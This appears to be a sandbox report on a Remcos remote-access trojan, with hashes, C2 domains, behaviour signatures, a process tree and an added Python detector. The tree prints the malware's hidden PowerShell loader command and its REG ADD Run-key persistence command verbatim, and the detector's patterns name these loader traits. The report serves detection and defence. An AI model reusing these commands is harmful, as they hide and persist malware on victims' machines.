Overview (score 10/10)

Task scores, as read from the report's task tabs (the analysis detailed below is the windows10-2004-x64 run of the .exe):

  Task                         Platform             Score
  Static                       static               1
  DOCUMET7887RAMADA@#$@!.exe   windows7-x64         8
  DOCUMET7887RAMADA@#$@!.exe   windows10-2004-x64   10
  Flanr.fje                    windows7-x64         3
  Flanr.fje                    windows10-2004-x64   3
  Krieker213.ps1               windows7-x64         3
  Krieker213.ps1               windows10-2004-x64   8
  Modisterne.pse               windows7-x64         3
  Modisterne.pse               windows10-2004-x64   3
  Uncleanness.eug              windows7-x64         3
  Uncleanness.eug              windows10-2004-x64   3
  dendropogon.txt              windows7-x64         1
  dendropogon.txt              windows10-2004-x64   1
  hjemstedskommunerne.cel      windows7-x64         3
  hjemstedskommunerne.cel      windows10-2004-x64   3
  olieraffinaderiers.fat       windows7-x64         3
  olieraffinaderiers.fat       windows10-2004-x64   3
Analysis

max time kernel: 147s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16/01/2025, 08:58
Tasks

  Task           Sample                       Resource
  static1        (static task)
  behavioral1    DOCUMET7887RAMADA@#$@!.exe   win7-20240729-en
  behavioral2    DOCUMET7887RAMADA@#$@!.exe   win10v2004-20241007-en
  behavioral3    Flanr.fje                    win7-20240903-en
  behavioral4    Flanr.fje                    win10v2004-20241007-en
  behavioral5    Krieker213.ps1               win7-20241010-en
  behavioral6    Krieker213.ps1               win10v2004-20241007-en
  behavioral7    Modisterne.pse               win7-20240903-en
  behavioral8    Modisterne.pse               win10v2004-20241007-en
  behavioral9    Uncleanness.eug              win7-20240903-en
  behavioral10   Uncleanness.eug              win10v2004-20241007-en
  behavioral11   dendropogon.txt              win7-20240708-en
  behavioral12   dendropogon.txt              win10v2004-20241007-en
  behavioral13   hjemstedskommunerne.cel      win7-20240903-en
  behavioral14   hjemstedskommunerne.cel      win10v2004-20241007-en
  behavioral15   olieraffinaderiers.fat       win7-20240903-en
  behavioral16   olieraffinaderiers.fat       win10v2004-20241007-en
General

Target: DOCUMET7887RAMADA@#$@!.exe
Size: 1.2MB
MD5: 6dbfced7845c936a56c3685329dc24d9
SHA1: 416db985d9b8defa1b99d17956aae3d767d9d92b
SHA256: 304947e91f66751b25d0899c7b9feffe43a5620b13fd5de4a8c5642d638ce45f
SHA512: 9ca83f6d19299abdfa872713d3646737e6319ef4c422d0af7c9bbd237a199f058126f05a451c91057970ac000d885b35b34fd3d46307947ee67847af6dca96f4
SSDEEP: 24576:myZDPLNLlTznkEU9gld5cYSOXQkPoNW+8pwcyLy2wFV3y:PrLlTgEcgzXX1PYAFn3y
Malware Config

Extracted family: remcos

Sent (the C2 host:port list; all five entries are DuckDNS dynamic-DNS names):
  haleleeh8iuoty1.duckdns.org:8347
  haleleeh8iuoty1.duckdns.org:37830
  haleleeh8iuoty2.duckdns.org:8347
  haleleeh8iuoty3.duckdns.org:8347
  haleleeh8iuoty4.duckdns.org:8347

audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: true
install_flag: false
keylog_crypt: false
keylog_file: kmirtup.dat
keylog_flag: false
keylog_path: %AppData%
mouse_option: false
mutex: aksoetuise-Y9DD4X
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
startup_value: (empty)
take_screenshot_option: false
take_screenshot_time: 5

Note that install_flag is false and startup_value is empty: Remcos's own copy-to-Remcos\remcos.exe installation and autostart are switched off in this build. The persistence seen in the process tree is set by the loader stage through reg.exe and re-launches the PowerShell chain, not remcos.exe, so a host check should look for the Run value "Bemixt" and the mutex aksoetuise-Y9DD4X rather than for a dropped remcos.exe.
Signatures

Remcos family

Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Runs PowerShell with its display window hidden.
  PID 4764  powershell.exe

Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bemixt = "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\\Software\\Genindlggelsen\\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)"  reg.exe

Blocklisted process makes network request (7 IoCs)
  flow  PID   process
  24    4844  msiexec.exe
  26    4844  msiexec.exe
  28    4844  msiexec.exe
  30    4844  msiexec.exe
  34    4844  msiexec.exe
  37    4844  msiexec.exe
  52    4844  msiexec.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow  IoC
  23    drive.google.com
  24    drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  PID 4844  msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  PID 4764  powershell.exe
  PID 4844  msiexec.exe

Drops file in Program Files directory (1 IoC)
  File opened for modification  C:\Program Files (x86)\Common Files\deistic.ini  DOCUMET7887RAMADA@#$@!.exe

Drops file in Windows directory (2 IoCs)
  File created                  C:\Windows\resources\bumpee\Ressourcekrvende.lnk  DOCUMET7887RAMADA@#$@!.exe
  File opened for modification  C:\Windows\Fonts\sluttishly\nonfeverish.tin  DOCUMET7887RAMADA@#$@!.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 5 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  reg.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  DOCUMET7887RAMADA@#$@!.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe

Modifies registry key (1 TTP, 1 IoC)
  PID 3860  reg.exe

Suspicious behavior: EnumeratesProcesses (9 IoCs)
  PID 4764  powershell.exe  (9 occurrences)

Suspicious behavior: MapViewOfSection (1 IoC)
  PID 4764  powershell.exe

Suspicious use of AdjustPrivilegeToken (22 IoCs)
  PID 4764  powershell.exe  enabled: SeDebugPrivilege (listed twice), SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and privilege LUIDs 33, 34, 35, 36 (not resolved to names by the report)

Suspicious use of SetWindowsHookEx (1 IoC)
  PID 4844  msiexec.exe

Suspicious use of WriteProcessMemory (13 IoCs)
  PID 1528 (DOCUMET7887RAMADA@#$@!.exe)  wrote to memory of 4764  3 times  (procid_target 82)
  PID 4764 (powershell.exe)               wrote to memory of 4844  4 times  (procid_target 89)
  PID 4844 (msiexec.exe)                  wrote to memory of 5076  3 times  (procid_target 92)
  PID 5076 (cmd.exe)                      wrote to memory of 3860  3 times  (procid_target 94)
Processes

1. C:\Users\Admin\AppData\Local\Temp\DOCUMET7887RAMADA@#$@!.exe  (PID 1528)
   Command line: "C:\Users\Admin\AppData\Local\Temp\DOCUMET7887RAMADA@#$@!.exe"
   - Drops file in Program Files directory
   - Drops file in Windows directory
   - System Location Discovery: System Language Discovery
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 4764)
      Command line: powershell.exe -windowstyle hidden "$Dynamik=GC -raw 'C:\Users\Admin\AppData\Roaming\Brixvold\reclusely\Krieker213.Fla';$balsal=$Dynamik.SubString(57497,3);.$balsal($Dynamik)"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\SysWOW64\msiexec.exe  (PID 4844)
         Command line: "C:\Windows\SysWOW64\msiexec.exe"
         - Blocklisted process makes network request
         - Suspicious use of NtCreateThreadExHideFromDebugger
         - Suspicious use of NtSetInformationThreadHideFromDebugger
         - System Location Discovery: System Language Discovery
         - Suspicious use of SetWindowsHookEx
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\SysWOW64\cmd.exe  (PID 5076)
            Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemixt" /t REG_EXPAND_SZ /d "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\Software\Genindlggelsen\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)"
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory

            5. C:\Windows\SysWOW64\reg.exe  (PID 3860)
               Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemixt" /t REG_EXPAND_SZ /d "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\Software\Genindlggelsen\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)"
               - Adds Run key to start application
               - System Location Discovery: System Language Discovery
               - Modifies registry key

Reading the tree: the dropper (1) starts a hidden 32-bit PowerShell (2) that reads Krieker213.Fla into a single string, takes the three characters at offset 57497 and dot-invokes them with the whole string as the argument, so the data file supplies its own invocation verb and the command line never names it. PowerShell then starts msiexec.exe (3) with no arguments and writes into it: on top of the three WriteProcessMemory calls every parent here makes toward its child, 4764 makes a fourth into 4844, PowerShell maps a section (MapViewOfSection) and msiexec.exe creates threads hidden from the debugger, which is the payload being placed into msiexec.exe; every network request the report attributes to a process comes from that msiexec.exe. From inside msiexec.exe the chain spawns cmd.exe (4) and reg.exe (5) to set persistence. The Run value is typed REG_EXPAND_SZ and begins with %Teknologiseringerne%, so the program it launches is only resolved from the environment at logon and the value itself names no interpreter; -windowstyle 1 is the numeric form of Hidden, and the script that runs is read back from HKCU\Software\Genindlggelsen\Pvc. The report does not show where %Teknologiseringerne% or the Pvc value are written, so on a live host check HKCU\Environment and that key as well as the Run value.
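The three traits of this chain (a hidden PowerShell stage that slices its invocation verb out of a data file, a Windows binary started with no arguments that then produces the network traffic, and a Run value of type REG_EXPAND_SZ whose program is an environment variable and whose script comes from another registry value) survive renaming of every file, so they are what a detection should key on. The following is an added example written for this page, not code from the sandbox vendor or from the report: a small Python detector run over constructed process events that reuse the report's PIDs and command lines. The parent PID 1000 of the dropper, the event shape, the marker list and the score threshold are assumptions of the example.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the executable
    cmdline: str   # command line as logged


# The REG ADD command as the report shows it on the reg.exe process (PID 3860).
REG_ADD = (r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemixt" '''
           r'''/t REG_EXPAND_SZ /d "%Teknologiseringerne% -windowstyle 1 '''
           r'''$Graensefunktion=(Get-Item 'HKCU:\Software\Genindlggelsen\').GetValue('Pvc');'''
           r'''%Teknologiseringerne% ($Graensefunktion)"''')

# Constructed events mirroring the report's process tree; PIDs and command
# lines are the report's, the dropper's parent PID 1000 is an assumption.
SAMPLE_EVENTS = [
    ProcEvent(1528, 1000, r"C:\Users\Admin\AppData\Local\Temp\DOCUMET7887RAMADA@#$@!.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\DOCUMET7887RAMADA@#$@!.exe"'),
    ProcEvent(4764, 1528, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -windowstyle hidden "$Dynamik=GC -raw '
              r"'C:\Users\Admin\AppData\Roaming\Brixvold\reclusely\Krieker213.Fla';"
              '$balsal=$Dynamik.SubString(57497,3);.$balsal($Dynamik)"'),
    ProcEvent(4844, 4764, r"C:\Windows\SysWOW64\msiexec.exe", r'"C:\Windows\SysWOW64\msiexec.exe"'),
    ProcEvent(5076, 4844, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD),
    ProcEvent(3860, 5076, r"C:\Windows\SysWOW64\reg.exe", REG_ADD),
]
NETWORK_PIDS = {4844}   # processes the report attributes network requests to

REG_ADD_RE = re.compile(r'''\bREG(?:\.exe)?\s+ADD\s+(?P<key>\S+).*?/v\s+"?(?P<name>[^"\s]+)"?'''
                        r'''.*?/t\s+(?P<type>REG_\w+).*?/d\s+"(?P<data>.*)"\s*$''', re.I | re.S)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$", re.I)
ENV_VAR_RE = re.compile(r"^\s*%([A-Za-z0-9_]+)%")
PS_LOADER_MARKERS = (
    re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I),       # hidden window
    re.compile(r"\b(?:GC|Get-Content|cat|type)\s+-raw\b", re.I),   # whole file as one string
    re.compile(r"\.SubString\(\s*\d+\s*,\s*\d+\s*\)", re.I),        # slice the verb out of it
    re.compile(r"[.&]\s*\$\w+\s*\("),                               # invoke the sliced string
)


def analyze_run_key_add(cmdline):
    """Details if cmdline is a reg.exe ADD into a Run/RunOnce key, else None.
    program_is_env_var: the value starts with %VAR%, so the program only resolves
    at logon and the Run value never names an interpreter.
    reads_registry_payload: the script body is fetched from another registry value."""
    m = REG_ADD_RE.search(cmdline)
    if not m or not RUN_KEY_RE.search(m["key"]):
        return None
    data, env = m["data"], ENV_VAR_RE.match(m["data"])
    return {
        "value_name": m["name"],
        "expand_sz": m["type"].upper() == "REG_EXPAND_SZ",
        "program_is_env_var": env.group(1) if env else None,
        "reads_registry_payload": bool(re.search(r"\.GetValue\(|Get-ItemProperty", data, re.I)),
        "hidden_window": bool(re.search(r"-windowstyle\s+(?:hidden|1)\b", data, re.I)),
    }


def powershell_loader_score(cmdline):
    """Number of stage-1 loader traits a PowerShell command line shows (0-4)."""
    if "powershell" not in cmdline.lower():
        return 0
    return sum(1 for marker in PS_LOADER_MARKERS if marker.search(cmdline))


def injected_hosts(events, network_pids):
    """Binaries under C:\\Windows started by PowerShell with no arguments at all
    that then talk to the network: the payload was written into them."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        bare = e.cmdline.strip().strip('"').lower() == e.image.lower()
        in_windows_dir = e.image.lower().startswith("c:\\windows\\")
        if (bare and in_windows_dir and e.pid in network_pids
                and parent is not None and "powershell" in parent.image.lower()):
            hits.append(e.pid)
    return hits


def detect_chain(events, network_pids):
    """Run all three checks and return (finding, pid, detail) tuples."""
    findings = []
    for e in events:
        score = powershell_loader_score(e.cmdline)
        if score >= 3:
            findings.append(("powershell_loader", e.pid, score))
        run = analyze_run_key_add(e.cmdline)
        if run and (run["program_is_env_var"] or run["reads_registry_payload"]):
            findings.append(("run_key_indirection", e.pid, run["value_name"]))
    for pid in injected_hosts(events, network_pids):
        findings.append(("injected_host", pid, None))
    return findings


if __name__ == "__main__":
    for finding in detect_chain(SAMPLE_EVENTS, NETWORK_PIDS):
        print(*finding)
```

Against the constructed events this reports the PowerShell stage (all four markers), the Run-key indirection on both cmd.exe and reg.exe, and msiexec.exe as the injected host. The Run-key check deliberately does not look for the word "powershell", because the value in this report never contains it; that is exactly what the %Teknologiseringerne% indirection is for.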
MITRE ATT&CK Enterprise v15 (framework version used for the TTP tags above)

Downloads
File 1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

File 2
  Filesize: 331KB
  MD5: 06acea567a0ded05680dbb9de58d0311
  SHA1: e84e2cde7049ce616b5cc579ce4b4d837423e586
  SHA256: fd3f116786b5db01589d0460c9e1ffccdc468237ee2db9941482c904bc20500b
  SHA512: e5c9492b5c49f75c92f45c9b577d67854d989e5672cfc3c2f8b4e831b00082f180834080e398bef69dcd0d3611d4404879e4b6ee9ef57afb2c421ea7f422bc14

File 3
  Filesize: 56KB
  MD5: 71ec49d3afc6876b0238400570d4028d
  SHA1: e661e5ca92fa77b576dd75c8d981936b2db5be88
  SHA256: 178d63022c2e5d42cd6f8dd983b8a4a19568e1370efad6c9c51f4b8807964885
  SHA512: dae10533f8b54e5dcd1e929a2af3270f201e22566961d27ef4c52ad359b821a4b95bab5469047fe61271111876208833450010d8cf1ce9bd73edcd829d6f21e2